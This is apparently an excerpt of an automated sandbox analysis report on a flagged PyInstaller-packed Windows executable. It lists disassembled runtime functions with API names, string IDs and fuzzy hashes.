                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 6ba1e51ca70c65bd71bd0112676f57214e957a2231fe0b48fe2598bebb14c8a0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A91CF62A08A4681F765EE34D4503BDB7A1EB60B94FC441B7DA5D833DBDE3CE8458322
                                                                                                                                                                                                                              Function 00007FF7EAD1FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction ID: 5dff4ca135240d0c977675bb2e43161060b7d3a62dbc8659e9e51c794e8daede
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E881AE76E0860385F764FE398140378A7E1EB29B44FD548B7CA099729DCB3CE902D223
                                                                                                                                                                                                                              Function 00007FF7EAD0D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction ID: ab2047001a50b041f61c36572c0e40ef350eed9651f876fd83d0bfdca23d7181
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2518132A196028AEB14EB15E484779B792EF84B9CF904177EA8E4774CDF7CE841C711
                                                                                                                                                                                                                              Function 00007FF7EAD0F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction ID: 32d7097a487a524cb60571632e0e6ec79fd7304bc9c24c450ee0a39434292182
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951823260834286FB64EA21908436EB7D6FB59B98FA48177DA4C47B89CF3CE451C712
                                                                                                                                                                                                                              Function 00007FF7EAD0EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction ID: d21d4bc1030ff94c50f310ac91b866b3a8e9e89ecb24f393cdf84b1a0ba57750
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D618232908BC585E760EB25E4803AEB7A1FB98788F544276EB9C03759CF7CD190CB11
                                                                                                                                                                                                                              Function 00007FF7EAD07E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF7EAD0352C,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD07F32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                              • Instruction ID: df1133399f990eec0029a3c2bf0e5599327757a551e291416c3c5cf70455a6bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9031E821619AC145FA21EB20E4907EAA355EF84BE8F800272EE6D477CDDF3CD6458721
                                                                                                                                                                                                                              Function 00007FF7EAD02810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction ID: 372e37d06d474096e91f2fde833aed86e05630f1b0b141587d3e2c14a81d2b76
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF21AE72B08B4182F710EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C750
                                                                                                                                                                                                                              Function 00007FF7EAD1C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction ID: 5d8201fa0a053522d8e2745fc031291a5de4dcc2ccc761ece97f39acabe0c75f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46D10272B08A918AF710DF75D4403ACBBB1FB64798B804276DE5E97B89DE38D106C321
                                                                                                                                                                                                                              Function 00007FF7EAD1F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction ID: b646dc32fdc2b01716099ffc340b7a1ed4211f84c7692e1b8b8c957dbdd4d13a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F510772F0421186FB14EF749A957BCA7A1EB68368F900277DD1E52AEDDB3CA402C611
                                                                                                                                                                                                                              Function 00007FF7EAD1577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction ID: cec8a74ef634075d583b2d591895f3102ba968675d24564c1a9b005a7a1d460a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF517A62E086418AFB10EFB1D4503BDA7B5EB68B58F908576DE0D5B688DF3CD4408762
                                                                                                                                                                                                                              Function 00007FF7EAD020C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 116b9c171df06c3b699768c802153cc3758b5bc8230ba9d9a71ca4fcbbf4221e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B811C631A0C54242F754E76AE5C437A9392EB98788FC44072DB4907B8DCD7DE9C58222
                                                                                                                                                                                                                              Function 00007FF7EAD25B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                              • Instruction ID: 0832f63381606b910b54b91cc4a58b1e48be86c60960d9c6e05e0e605ec3dc26
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01412922A0828242FB60EB25D50577AE760EB81BA4F944276EE5C07ADDFF3CD441C721
                                                                                                                                                                                                                              Function 00007FF7EAD19014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD19046
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7EAD0CBA5), ref: 00007FF7EAD19064
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, xrefs: 00007FF7EAD19052
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-3707282323
                                                                                                                                                                                                                              • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                              • Instruction ID: 09989019731bc11d295b86d517404659dbd2b4d5995e343ae4d049c5235a4405
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3418C72A08A0286FB15EF31D8402BDA7A4EB55790B9540B6E94E47B99DE3CE4C1C322
                                                                                                                                                                                                                              Function 00007FF7EAD1CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                              • Instruction ID: a2595562d678dce318dea90b3f32f44ee078f15d798888efe63efa9cfaa06a50
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
